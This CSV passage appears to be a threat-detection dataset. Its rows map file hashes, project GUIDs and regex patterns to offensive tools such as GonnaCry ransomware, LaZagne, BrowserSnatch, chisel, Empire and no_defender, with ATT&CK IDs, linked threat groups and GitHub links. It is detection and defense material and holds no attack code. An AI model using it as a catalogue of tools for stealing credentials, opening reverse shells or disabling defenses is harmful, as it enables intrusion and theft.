"*31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf*",".{0,1000}31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24301"
"*3203466ca861519109bd827fc930867acd7062c4f2171eebd4b3c21f1632454b*",".{0,1000}3203466ca861519109bd827fc930867acd7062c4f2171eebd4b3c21f1632454b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24302"
"*3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380*",".{0,1000}3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24304"
"*320ed251abc046f440dc0e76d00864d6cf5f65dee61988898d86c18e5513a8c9*",".{0,1000}320ed251abc046f440dc0e76d00864d6cf5f65dee61988898d86c18e5513a8c9.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","24305"
"*320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00*",".{0,1000}320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24306"
"*321130ac317775324693046f35bab564fa7dc26e9b6160d5bf990f5ea399b418*",".{0,1000}321130ac317775324693046f35bab564fa7dc26e9b6160d5bf990f5ea399b418.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24307"
"*321266cbbd238c3172a32249b3cfb9101d0b29a15c0418e62290d9dc3aace58f*",".{0,1000}321266cbbd238c3172a32249b3cfb9101d0b29a15c0418e62290d9dc3aace58f.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","24308"
"*32201855814f2d6df4a5803a8eb182fe10e401da90fdbf67c2318c523b4fd619*",".{0,1000}32201855814f2d6df4a5803a8eb182fe10e401da90fdbf67c2318c523b4fd619.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","24312"
"*32221248ee8f748433e89431976294ffa3a62c500e364699cb67fa8471b9c0be*",".{0,1000}32221248ee8f748433e89431976294ffa3a62c500e364699cb67fa8471b9c0be.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24313"
"*32223BE8-3E78-489C-92ED-7900B26DFF43*",".{0,1000}32223BE8\-3E78\-489C\-92ED\-7900B26DFF43.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24314"
"*32224892b670467e23874d7e8abd2ef92987a7e6*",".{0,1000}32224892b670467e23874d7e8abd2ef92987a7e6.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","24315"
"*32292398eca5d75150f89d07a622728e52302a73573ec7e1a28268dbe5079ac2*",".{0,1000}32292398eca5d75150f89d07a622728e52302a73573ec7e1a28268dbe5079ac2.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","24318"
"*323791a9dcce15b9b410a9cbbc91296cbccdaeb6198926fbf54c7b159ecd9e03*",".{0,1000}323791a9dcce15b9b410a9cbbc91296cbccdaeb6198926fbf54c7b159ecd9e03.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24319"
"*3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12*",".{0,1000}3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24321"
"*3246bb6e6b258b85286ae566dbde16e6e61c35d21be06a0d03b1aad376efb411*",".{0,1000}3246bb6e6b258b85286ae566dbde16e6e61c35d21be06a0d03b1aad376efb411.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","24322"
"*325e02205522272bfa9d390ff16ef35620b45fa9422b851c13e0177c56dfdb1d*",".{0,1000}325e02205522272bfa9d390ff16ef35620b45fa9422b851c13e0177c56dfdb1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24324"
"*326D0AB1-CF2F-4A9B-B612-04B62D4EBA89*",".{0,1000}326D0AB1\-CF2F\-4A9B\-B612\-04B62D4EBA89.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","24327"
"*326d52ca3b8d610e573b195adb1af8025412c5557434ad7851eb2bb23bded779*",".{0,1000}326d52ca3b8d610e573b195adb1af8025412c5557434ad7851eb2bb23bded779.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24328"
"*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24329"
"*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24330"
"*326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567*",".{0,1000}326e22bdce3db54f97f230ad600f03908f9a582944d481f293cd7013ce2e8567.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24331"
"*32858fab2bfbbde5516cdcf181d96b25960071b1516fec04b03f96d2fa5395d7*",".{0,1000}32858fab2bfbbde5516cdcf181d96b25960071b1516fec04b03f96d2fa5395d7.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24336"
"*329797f116972ec9d9ef719592d687908a2dd4bd5066900bee5452225ca8beb3*",".{0,1000}329797f116972ec9d9ef719592d687908a2dd4bd5066900bee5452225ca8beb3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24338"
"*329a409b807991c382c0ca408581264c8e092defd38336e599a2a1411d4b4383*",".{0,1000}329a409b807991c382c0ca408581264c8e092defd38336e599a2a1411d4b4383.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24339"
"*32a194633e4fb7143e68bdc59a8b1688819b286ea17a069605728bcf08fd357b*",".{0,1000}32a194633e4fb7143e68bdc59a8b1688819b286ea17a069605728bcf08fd357b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24340"
"*32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD*",".{0,1000}32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","24341"
"*32a53f3d4ecb4456372191071783bcaf9fd95ae442722202d7fd52b3da9b89d3*",".{0,1000}32a53f3d4ecb4456372191071783bcaf9fd95ae442722202d7fd52b3da9b89d3.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","24343"
"*32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84*",".{0,1000}32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24345"
"*32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c*",".{0,1000}32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","24346"
"*32c3b62e05eb08f482b00ca28bca9b43d743048f287e9b42193df91d6ddcd09a*",".{0,1000}32c3b62e05eb08f482b00ca28bca9b43d743048f287e9b42193df91d6ddcd09a.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","24348"
"*32ca6ae0de534fa368856fdec13bf2f5ca97879f1e50d5b789c5c0dff5081150*",".{0,1000}32ca6ae0de534fa368856fdec13bf2f5ca97879f1e50d5b789c5c0dff5081150.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24349"
"*32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0*",".{0,1000}32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","24350"
"*32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55*",".{0,1000}32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24351"
"*32cd91c759b8cb4efca9582ee8ff760f1121f109a5e54a6c6da956713ef81f0f*",".{0,1000}32cd91c759b8cb4efca9582ee8ff760f1121f109a5e54a6c6da956713ef81f0f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24352"
"*32CE1CB1-B7D9-416F-8EFE-6A0055867537*",".{0,1000}32CE1CB1\-B7D9\-416F\-8EFE\-6A0055867537.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24353"
"*32ce854a87a19f1e5caee7ae16dddd79d2877da1abeb6ff5c44a879708d6ab32*",".{0,1000}32ce854a87a19f1e5caee7ae16dddd79d2877da1abeb6ff5c44a879708d6ab32.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24354"
"*32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe*",".{0,1000}32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","24355"
"*32d18b1f5e53d194a9875e279d9a9ce2c8beb912f53f38877ec61bef2cb49bec*",".{0,1000}32d18b1f5e53d194a9875e279d9a9ce2c8beb912f53f38877ec61bef2cb49bec.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24356"
"*32d4ef57fb08b0312045fd5f521a857f42019c4edfd21757bfc2d5dd2d4f0254*",".{0,1000}32d4ef57fb08b0312045fd5f521a857f42019c4edfd21757bfc2d5dd2d4f0254.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24357"
"*32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90*",".{0,1000}32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24358"
"*32db0ad0f6cdbdd9481c02062ed78535bd65185331a7ae6b198e3e5eb6b5a59a*",".{0,1000}32db0ad0f6cdbdd9481c02062ed78535bd65185331a7ae6b198e3e5eb6b5a59a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24359"
"*32dca4493f6efae39b557be6803c241f7d88f7871f0fb5fde9c4ea0175d77518*",".{0,1000}32dca4493f6efae39b557be6803c241f7d88f7871f0fb5fde9c4ea0175d77518.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24361"
"*32e0f5302e5f96eebb6d3b5c4492521713f4dfe4b377a300a5313533c070b62f*",".{0,1000}32e0f5302e5f96eebb6d3b5c4492521713f4dfe4b377a300a5313533c070b62f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24363"
"*32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e*",".{0,1000}32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24364"
"*32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07*",".{0,1000}32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24365"
